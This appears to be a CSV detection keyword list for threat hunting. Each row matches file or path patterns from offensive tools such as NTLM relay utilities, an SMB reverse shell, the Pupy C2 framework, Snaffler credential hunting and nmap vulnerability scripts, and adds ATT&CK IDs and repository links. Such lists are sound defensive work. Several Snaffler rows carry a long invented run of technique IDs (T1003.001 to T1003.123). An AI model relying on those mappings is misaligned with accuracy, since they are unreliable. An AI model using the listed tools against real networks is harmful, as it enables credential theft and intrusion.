"*/smbrelayserver.py*",".{0,1000}\/smbrelayserver\.py.{0,1000}","offensive_tool_keyword","NtlmRelayToEWS","ntlmRelayToEWS is a tool for performing ntlm relay attacks on Exchange Web Services (EWS)","T1212 - T1557 - T1040 - T1078","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/Arno0x/NtlmRelayToEWS","1","1","N/A","10","4","327","62","2018-01-15T12:48:02Z","2017-10-13T18:00:50Z" "*/smb-reverse-shell*",".{0,1000}\/smb\-reverse\-shell.{0,1000}","offensive_tool_keyword","smb-reverse-shell","A Reverse Shell which uses an XML file on an SMB share as a communication channel.","T1021.002 - T1027 - T1105","TA0008 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/r1cksec/smb-reverse-shell","1","1","N/A","10","10","13","0","2024-02-17T12:20:01Z","2022-01-16T21:02:14Z" "*/smb-security-mode.nse*",".{0,1000}\/smb\-security\-mode\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smbserver/smb_server.py*",".{0,1000}\/smbserver\/smb_server\.py.{0,1000}","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","1","N/A","N/A","6","545","93","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" "*/smb-server-stats.nse*",".{0,1000}\/smb\-server\-stats\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb-signing-disabled-hosts.txt*",".{0,1000}\/smb\-signing\-disabled\-hosts\.txt.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*/smbspider.py*",".{0,1000}\/smbspider\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/smbsr.db*",".{0,1000}\/smbsr\.db.{0,1000}","offensive_tool_keyword","SMBSR","Lookup for interesting stuff in SMB shares","T1110.001 - T1046 - T1021.002 - T1077.001 - T1069.002 - T1083 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Reconnaissance","https://github.com/oldboy21/SMBSR","1","1","N/A","N/A","2","146","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" "*/smbsr.db*",".{0,1000}\/smbsr\.db.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","7","2","146","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" "*/SMBSR.git*",".{0,1000}\/SMBSR\.git.{0,1000}","offensive_tool_keyword","SMBSR","Lookup for interesting stuff in SMB shares","T1110.001 - T1046 - T1021.002 - T1077.001 - T1069.002 - T1083 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Reconnaissance","https://github.com/oldboy21/SMBSR","1","1","N/A","N/A","2","146","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" "*/SMBSR.git*",".{0,1000}\/SMBSR\.git.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","1","N/A","7","2","146","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" "*/smbsr.log*",".{0,1000}\/smbsr\.log.{0,1000}","offensive_tool_keyword","SMBSR","Lookup for interesting stuff in SMB shares","T1110.001 - T1046 - T1021.002 - T1077.001 - T1069.002 - T1083 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Reconnaissance","https://github.com/oldboy21/SMBSR","1","1","N/A","N/A","2","146","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" "*/smbsr.log*",".{0,1000}\/smbsr\.log.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","1","N/A","7","2","146","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" "*/smbsr.py*",".{0,1000}\/smbsr\.py.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","1","N/A","7","2","146","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" "*/smbsr_results.csv*",".{0,1000}\/smbsr_results\.csv.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","1","N/A","7","2","146","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" "*/smb-system-info.nse*",".{0,1000}\/smb\-system\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb-vuln.py*",".{0,1000}\/smb\-vuln\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*/smb-vuln-conficker.nse*",".{0,1000}\/smb\-vuln\-conficker\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb-vuln-cve2009-3103.nse*",".{0,1000}\/smb\-vuln\-cve2009\-3103\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb-vuln-cve-2017-7494.nse*",".{0,1000}\/smb\-vuln\-cve\-2017\-7494\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb-vuln-cve-2020-0796.nse*",".{0,1000}\/smb\-vuln\-cve\-2020\-0796\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","1","N/A","N/A","10","936","371","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z" "*/smb-vuln-ms06-025.nse*",".{0,1000}\/smb\-vuln\-ms06\-025\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb-vuln-ms07-029.nse*",".{0,1000}\/smb\-vuln\-ms07\-029\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb-vuln-ms08-067.nse*",".{0,1000}\/smb\-vuln\-ms08\-067\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb-vuln-ms10-054.nse*",".{0,1000}\/smb\-vuln\-ms10\-054\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb-vuln-ms10-061.nse*",".{0,1000}\/smb\-vuln\-ms10\-061\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb-vuln-ms17-010.nse*",".{0,1000}\/smb\-vuln\-ms17\-010\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb-vuln-regsvc-dos.nse*",".{0,1000}\/smb\-vuln\-regsvc\-dos\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb-vuln-webexec.nse*",".{0,1000}\/smb\-vuln\-webexec\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb-webexec-exploit.nse*",".{0,1000}\/smb\-webexec\-exploit\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/SMShell.git*",".{0,1000}\/SMShell\.git.{0,1000}","offensive_tool_keyword","SMShell","PoC for a SMS-based shell. Send commands and receive responses over SMS from mobile broadband capable computers","T1021.001 - T1059.006 - T1071.004 - T1069.003","TA0002 - TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/persistent-security/SMShell","1","1","N/A","10","10","344","37","2023-05-22T10:40:16Z","2023-05-22T08:26:44Z" "*/SMShell/*",".{0,1000}\/SMShell\/.{0,1000}","offensive_tool_keyword","SMShell","PoC for a SMS-based shell. Send commands and receive responses over SMS from mobile broadband capable computers","T1021.001 - T1059.006 - T1071.004 - T1069.003","TA0002 - TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/persistent-security/SMShell","1","0","N/A","10","10","344","37","2023-05-22T10:40:16Z","2023-05-22T08:26:44Z" "*/smtp-brute.nse*",".{0,1000}\/smtp\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smtp-commands.nse*",".{0,1000}\/smtp\-commands\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smtp-enum-users.nse*",".{0,1000}\/smtp\-enum\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smtp-ntlm-info.nse*",".{0,1000}\/smtp\-ntlm\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smtp-open-relay.nse*",".{0,1000}\/smtp\-open\-relay\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smtp-strangeport.nse*",".{0,1000}\/smtp\-strangeport\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smtp-user-enum*",".{0,1000}\/smtp\-user\-enum.{0,1000}","offensive_tool_keyword","smtp-user-enum","Username guessing tool primarily for use against the default Solaris SMTP service. Can use either EXPN - VRFY or RCPT TO.","T1133 - T1110.001","TA0007 - TA0006","N/A","N/A","Credential Access","https://pentestmonkey.net/tools/user-enumeration/smtp-user-enum","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smtp-vuln-cve2010-4344.nse*",".{0,1000}\/smtp\-vuln\-cve2010\-4344\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smtp-vuln-cve2011-1720.nse*",".{0,1000}\/smtp\-vuln\-cve2011\-1720\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smtp-vuln-cve2011-1764.nse*",".{0,1000}\/smtp\-vuln\-cve2011\-1764\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smtp-vuln-cve2020-28017-through-28026-21nails.nse*",".{0,1000}\/smtp\-vuln\-cve2020\-28017\-through\-28026\-21nails\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/nccgroup/nmap-nse-vulnerability-scripts","1","1","N/A","N/A","7","620","61","2022-03-04T09:08:55Z","2021-05-18T15:20:30Z" "*/smuggler.py*",".{0,1000}\/smuggler\.py.{0,1000}","offensive_tool_keyword","smuggler.py","HTML Smuggling Generator","T1564.001 - T1027 - T1566","TA0005","N/A","N/A","Phishing - Defense Evasion","https://github.com/infosecn1nja/red-team-scripts/blob/main/smuggler.py","1","1","N/A","9","3","245","46","2023-06-14T02:13:19Z","2023-01-15T22:37:34Z" "*/SnaffCon.cs*",".{0,1000}\/SnaffCon\.cs.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1824","186","2024-04-15T05:55:16Z","2020-03-30T07:03:47Z" "*/SnaffCon/Snaffler*",".{0,1000}\/SnaffCon\/Snaffler.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1824","186","2024-04-15T05:55:16Z","2020-03-30T07:03:47Z" "*/SnaffCore/*",".{0,1000}\/SnaffCore\/.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1824","186","2024-04-15T05:55:16Z","2020-03-30T07:03:47Z" "*/Snaffler.exe*",".{0,1000}\/Snaffler\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/snaffler.py*",".{0,1000}\/snaffler\.py.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","1","N/A","10","1","75","4","2023-12-03T20:02:25Z","2023-11-17T21:52:40Z" "*/snafflertest/*",".{0,1000}\/snafflertest\/.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - 